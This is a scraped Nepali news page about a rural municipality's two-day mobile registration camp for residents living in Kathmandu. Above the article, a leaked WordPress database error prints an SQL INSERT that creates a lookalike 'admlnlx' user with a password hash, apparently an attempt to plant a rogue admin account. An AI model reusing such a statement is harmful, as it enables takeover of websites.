WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BVFjUlE5qH6rh.fFwSEPtxBpAkFmJL.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 12:02:05', '', 'admlnlx', 'admlnlx')

माप्य दुधकोशी गाउँपालिकाको दुईदिने घुम्ती शिबिर शुरु – Gaule Khabar

माप्य दुधकोशी गाउँपालिकाको दुईदिने घुम्ती शिबिर शुरु

माप्य दुधकोशी गाउँपालिकाको दुईदिने घुम्ती शिबिर शुरु

काठमाडौं । माप्यदुधकोशी गाउँपालिका वडा न. १, ३, ४ र ७ ले काठमाडौमा बसोबास गर्ने वडाबासिको लागि दुइदिने दिने घुम्ती शिबिर सञ्चालन गरेको छ ।

काठमाडौंको टुसालस्थित सेभच्याईस क्याफेमा आज (बुधबार)बाट शुरु गरिएको शिबिर भोलि सम्म सन्चालन हुने आयोजक कमिटिले जनाएको छ ।

माप्य दुधकोशी गाउँपालिका अध्यक्ष बुद्विकिरण राई, उपाध्यक्ष गौरब राई, नि. प्रशासकीय प्रमुख जितेन्द्र कुमार यादब, वडाध्यक्ष सज्जन राई, अमित राई, भक्त राई र सगुतिज राईको उपस्थितिमा सुरु भएको शिबिरमा जन्मदर्ता, बिबाह दर्ता, मृत्यु दर्ता, नाता प्रमाणित, सामाजिक सुरक्षा भत्ता नवीकरण, मालपोत रसिद जस्ता सेवा प्रदान गरिने गाउँपालिकाले जनाएको छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका